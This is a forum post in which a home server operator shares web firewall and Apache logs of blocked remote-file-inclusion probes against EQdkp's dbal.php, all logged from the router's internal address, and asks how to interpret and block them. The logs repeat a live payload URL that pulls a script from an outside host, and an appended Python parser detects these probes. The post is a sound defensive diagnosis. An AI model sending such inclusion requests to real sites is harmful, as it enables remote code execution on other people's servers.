The IP that attempted the intrusion is my router???

Posted by 문경윤

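I am running the mod_security web application firewall.
I run the server at home and offer free hosting on it.
It sits behind a router. The router's address is 192.168.0.254.
The router suddenly started lagging badly, and the Internet stopped working properly not only on the server but on my desktop as well, so I analyzed the server logs.
I have been cracked before. Intrusion attempts keep coming in against the same account.

First, here is the log of intrusion traces caught by the mod_security filtering policy.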


[05/Feb/2008:11:31:58 +0900] [www.ktguild.net/sid#9874ab8][rid#997d368][/home/newdkp/eqdkp//includes/dbal.php][1] Access denied with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"]
[05/Feb/2008:11:31:59 +0900] [www.ktguild.net/sid#9874ab8][rid#9966310][//includes/dbal.php][1] Access denied with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"]
[05/Feb/2008:11:31:59 +0900] [www.ktguild.net/sid#9874ab8][rid#9966310][/home/newdkp//includes/dbal.php][1] Access denied with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"]
[05/Feb/2008:11:32:53 +0900] [www.wowvindicators.com/sid#9874ab8][rid#9966310][/eqdkp//includes/dbal.php][1] Access denied with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"]
[05/Feb/2008:11:32:55 +0900] [www.wowvindicators.com/sid#9874ab8][rid#9966310][//includes/dbal.php][1] Access denied with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"]
[05/Feb/2008:11:36:48 +0900] [www.wowhost.dk/sid#9874ab8][rid#997f370][/oldtimers/dkp/plugins/raidplan//includes/dbal.php][1] Access denied with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"]
[05/Feb/2008:11:43:45 +0900] [www.projmayhem.com/sid#9874ab8][rid#9971338][/dkp//includes/dbal.php][1] Access denied with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"]

Next is the content of /usr/local/apache/logs/error_log.

 

[Tue Feb 05 11:22:41 2008] [error] [client 192.168.0.254] mod_security: Access denied with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"] [hostname "www.seraphinguild.net"] [uri "//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:23:18 2008] [error] [client 192.168.0.254] mod_security: Access denied with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"] [hostname "www.hgfollowers.com"] [uri "/dkp/plugins/raidplan//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:23:28 2008] [error] [client 192.168.0.254] mod_security: Access denied with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"] [hostname "www.hgfollowers.com"] [uri "//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:23:38 2008] [error] [client 192.168.0.254] mod_security: Access denied with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"] [hostname "www.hgfollowers.com"] [uri "/dkp/plugins//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:24:06 2008] [error] [client 192.168.0.254] mod_security: Access denied with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"] [hostname "www.fragfrogs.ca"] [uri "/dkp/plugins/raidplan//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:24:17 2008] [error] [client 192.168.0.254] mod_security: Access denied with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"] [hostname "www.fragfrogs.ca"] [uri "//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:24:27 2008] [error] [client 192.168.0.254] mod_security: Access denied with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"] [hostname "www.fragfrogs.ca"] [uri "/dkp/plugins//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:24:38 2008] [error] [client 192.168.0.254] mod_security: Access denied with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"] [hostname "www.destinyknights.com"] [uri "//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:25:22 2008] [error] [client 192.168.0.254] mod_security: Access denied with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"] [hostname "destinyknights.com"] [uri "/eqdkp//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:25:32 2008] [error] [client 192.168.0.254] mod_security: Access denied with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"] [hostname "destinyknights.com"] [uri "//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:25:33 2008] [error] [client 192.168.0.254] mod_security: Access denied with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"] [hostname "www.seraphinguild.net"] [uri "/core//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:28:20 2008] [error] [client 192.168.0.254] mod_security: Access denied with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"] [hostname "www.hgfollowers.com"] [uri "/dkp//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:31:58 2008] [error] [client 192.168.0.254] mod_security: Access denied with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"] [hostname "www.ktguild.net"] [uri "/home/newdkp/eqdkp//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:31:59 2008] [error] [client 192.168.0.254] mod_security: Access denied with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"] [hostname "www.ktguild.net"] [uri "//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:31:59 2008] [error] [client 192.168.0.254] mod_security: Access denied with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"] [hostname "www.ktguild.net"] [uri "/home/newdkp//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:32:53 2008] [error] [client 192.168.0.254] mod_security: Access denied with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"] [hostname "www.wowvindicators.com"] [uri "/eqdkp//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:32:55 2008] [error] [client 192.168.0.254] mod_security: Access denied with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"] [hostname "www.wowvindicators.com"] [uri "//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:36:48 2008] [error] [client 192.168.0.254] mod_security: Access denied with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"] [hostname "www.wowhost.dk"] [uri "/oldtimers/dkp/plugins/raidplan//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:43:45 2008] [error] [client 192.168.0.254] mod_security: Access denied with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"] [hostname "www.projmayhem.com"] [uri "/dkp//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:46:17 2008] [error] [client 192.168.0.254] mod_security: Access denied with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"] [hostname "equitas-guild.info"] [uri "/eqdkp//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:46:23 2008] [error] [client 192.168.0.254] mod_security: Access denied with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"] [hostname "equitas-guild.info"] [uri "//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:47:17 2008] [error] [client 192.168.0.254] mod_security: Access denied with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"] [hostname "www.fragfrogs.ca"] [uri "/dkp2//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:48:12 2008] [error] [client 192.168.0.254] mod_security: Access denied with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"] [hostname "www.ohayojapan.com"] [uri "/dkp/plugins/raidplan//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:48:13 2008] [error] [client 192.168.0.254] mod_security: Access denied with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"] [hostname "www.ohayojapan.com"] [uri "//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:48:17 2008] [error] [client 192.168.0.254] mod_security: Access denied with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"] [hostname "www.ohayojapan.com"] [uri "/dkp/plugins//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]

Finally, here is the content of /usr/local/apache/logs/access_log. I gathered only the entries recorded in the same time window as the intrusion attempts left in the web firewall and Apache error logs.

 

192.168.0.254 - - [05/Feb/2008:11:31:58 +0900] "GET /home/newdkp/eqdkp//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt? HTTP/1.1" 403 305 "-" "libwww-perl/5.79"

192.168.0.254 - - [05/Feb/2008:11:31:59 +0900] "GET //includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt? HTTP/1.1" 403 287 "-" "libwww-perl/5.79"
192.168.0.254 - - [05/Feb/2008:11:31:59 +0900] "GET /home/newdkp//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt? HTTP/1.1" 403 299 "-" "libwww-perl/5.79"
121.136.176.72 - - [05/Feb/2008:11:31:59 +0900] "GET /8th/images/98img/analysis_terry.gif HTTP/1.1" 200 5441 "http://blog.naver.com/PostList.nhn?blogId=fkdiidkrk&currentPage=103&categoryNo=30&viewdate=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

192.168.0.254 - - [05/Feb/2008:11:32:53 +0900] "GET /eqdkp//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt? HTTP/1.1" 403 300 "-" "libwww-perl/5.79"

61.35.195.4 - - [05/Feb/2008:11:32:55 +0900] "GET /frb.JPG HTTP/1.1" 304 - "http://mse9000.digimoon.net/CGI/zb41/zboard.php?id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=off&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB 14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55 +0900] "GET /CGI/zb41/skin/urban_black_forum/images/item_num.gif HTTP/1.1" 304 - "http://mse9000.digimoon.net/CGI/zb41/zboard.php?id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=off&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB 14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55 +0900] "GET /CGI/zb41/skin/urban_black_forum/images/title_breaker.gif HTTP/1.1" 304 - "http://mse9000.digimoon.net/CGI/zb41/zboard.php?id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=off&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB 14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55 +0900] "GET /CGI/zb41/skin/urban_black_forum/images/item_date.gif HTTP/1.1" 304 - "http://mse9000.digimoon.net/CGI/zb41/zboard.php?id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=off&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB 14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55 +0900] "GET /CGI/zb41/skin/urban_black_forum/images/item_subject.gif HTTP/1.1" 304 - "http://mse9000.digimoon.net/CGI/zb41/zboard.php?id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=off&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB 14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
192.168.0.254 - - [05/Feb/2008:11:32:55 +0900] "GET //includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt? HTTP/1.1" 403 294 "-" "libwww-perl/5.79"
61.35.195.4 - - [05/Feb/2008:11:32:55 +0900] "GET /CGI/zb41/skin/urban_black_forum/images/btn_list.gif HTTP/1.1" 304 - "http://mse9000.digimoon.net/CGI/zb41/zboard.php?id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=off&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB 14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55 +0900] "GET /CGI/zb41/skin/urban_black_forum/images/item_vote.gif HTTP/1.1" 304 - "http://mse9000.digimoon.net/CGI/zb41/zboard.php?id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=off&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB 14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55 +0900] "GET /CGI/zb41/skin/urban_black_forum/images/item_register.gif HTTP/1.1" 304 - "http://mse9000.digimoon.net/CGI/zb41/zboard.php?id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=off&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB 14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55 +0900] "GET /CGI/zb41/skin/urban_black_forum/images/blank.gif%20width= HTTP/1.1" 404 325 "http://mse9000.digimoon.net/CGI/zb41/zboard.php?id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=off&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB 14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55 +0900] "GET /CGI/zb41/skin/urban_black_forum/images/item_view.gif HTTP/1.1" 304 - "http://mse9000.digimoon.net/CGI/zb41/zboard.php?id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=off&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB 14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55 +0900] "GET /CGI/zb41/skin/urban_black_forum/t.gif HTTP/1.1" 304 - "http://mse9000.digimoon.net/CGI/zb41/zboard.php?id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=off&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB 14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55 +0900] "GET /CGI/zb41/skin/urban_black_forum/search.gif HTTP/1.1" 304 - "http://mse9000.digimoon.net/CGI/zb41/zboard.php?id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=off&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB 14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55 +0900] "GET /CGI/zb41/skin/urban_black_forum/cancle.gif HTTP/1.1" 304 - "http://mse9000.digimoon.net/CGI/zb41/zboard.php?id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=off&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB 14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

192.168.0.254 - - [05/Feb/2008:11:36:48 +0900] "GET /oldtimers/dkp/plugins/raidplan//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt? HTTP/1.1" 403 317 "-" "libwww-perl/5.79"

192.168.0.254 - - [05/Feb/2008:11:43:45 +0900] "GET /dkp//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt? HTTP/1.1" 403 294 "-" "libwww-perl/5.79"

When I check processes with the ps -ef command, strange entries like the ones below still show up even now.

 

nobody    4914     1  0 10:39 ?        00:00:00 /^^/
nobody    5112     1  0 10:41 ?        00:00:01 /^^/
nobody    5114     1  0 10:41 ?        00:00:01 /^^/
nobody    5118     1  0 10:42 ?        00:00:01 /^^/
nobody    5120     1  0 10:42 ?        00:00:10 /^^/

Looking at the server load with the top command, nothing seems wrong either. The only thing is that the number of zombie processes fluctuates between 3 and 4.

 

 14:18,  2 users,  load average: 0.07, 0.11, 0.13
Tasks: 117 total,   1 running, 112 sleeping,   1 stopped,   3 zombie
Cpu(s):  0.0% us,  0.3% sy,  0.0% ni, 99.0% id,  0.7% wa,  0.0% hi,  0.0% si
Mem:    514736k total,   438260k used,    76476k free,    21104k buffers
Swap:  1052248k total,     3692k used,  1048556k free,   247484k cached

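As you can see from the access_log file, the intrusion attempts are recorded as coming from the router's address.
Whenever I was cracked before, only external IPs showed up, but this is the first time I have seen a record like today's. It shows up as the router's internal address.
What kind of intrusion should I take this to be?

I need to block the IP or something, but since it shows up as the router, I'm at a loss.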
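
Added example (not part of the original post): the probes above are logged with the router's private address 192.168.0.254, so the logged client IP is not a usable block key. This sketch parses access_log lines in Apache combined format and groups the remote-include probes by request signature (script, parameter, remote URL, User-Agent) instead. The function names are this example's own, and the sample lines are constructed from the entries above, one per line, with the last referer and User-Agent shortened.

```python
import ipaddress
import re
from collections import Counter
from urllib.parse import parse_qsl

# Apache combined format: host ident user [time] "request" status bytes "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
REMOTE_VALUE = re.compile(r"^(?:https?|ftp)://", re.I)

# Constructed sample: access_log entries from the post, one per line, last entry shortened.
SAMPLE_LOG = """\
192.168.0.254 - - [05/Feb/2008:11:31:58 +0900] "GET /home/newdkp/eqdkp//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt? HTTP/1.1" 403 305 "-" "libwww-perl/5.79"
192.168.0.254 - - [05/Feb/2008:11:31:59 +0900] "GET //includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt? HTTP/1.1" 403 287 "-" "libwww-perl/5.79"
121.136.176.72 - - [05/Feb/2008:11:31:59 +0900] "GET /8th/images/98img/analysis_terry.gif HTTP/1.1" 200 5441 "http://blog.naver.com/PostList.nhn?blogId=fkdiidkrk&currentPage=103&categoryNo=30&viewdate=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
192.168.0.254 - - [05/Feb/2008:11:32:53 +0900] "GET /eqdkp//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt? HTTP/1.1" 403 300 "-" "libwww-perl/5.79"
61.35.195.4 - - [05/Feb/2008:11:32:55 +0900] "GET /frb.JPG HTTP/1.1" 304 - "http://mse9000.digimoon.net/CGI/zb41/zboard.php?id=Kommunity_Freeboard" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
"""


def is_private(host):
    """True when the logged client is a private-use (e.g. RFC 1918) address."""
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:  # a hostname was logged instead of an address
        return False


def summarize(log_text):
    """Count remote-include probes per request signature; collect private sources."""
    signatures, private_sources = Counter(), set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m is None:
            continue  # not a combined-format line
        path, _, query = m["target"].partition("?")
        # Collapse repeated slashes so /eqdkp//includes/dbal.php and
        # //includes/dbal.php reduce to the same script name.
        script = re.sub(r"/+", "/", path).rsplit("/", 1)[-1]
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_VALUE.match(value):  # the parameter value is itself a URL
                signatures[(script, name, value, m["agent"])] += 1
                if is_private(m["host"]):
                    private_sources.add(m["host"])
    return signatures, private_sources


if __name__ == "__main__":
    sigs, private = summarize(SAMPLE_LOG)
    for (script, name, value, agent), n in sigs.most_common():
        print(f"{n} probes: {script}?{name}={value} UA={agent}")
    print("logged from private addresses:", sorted(private))
```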
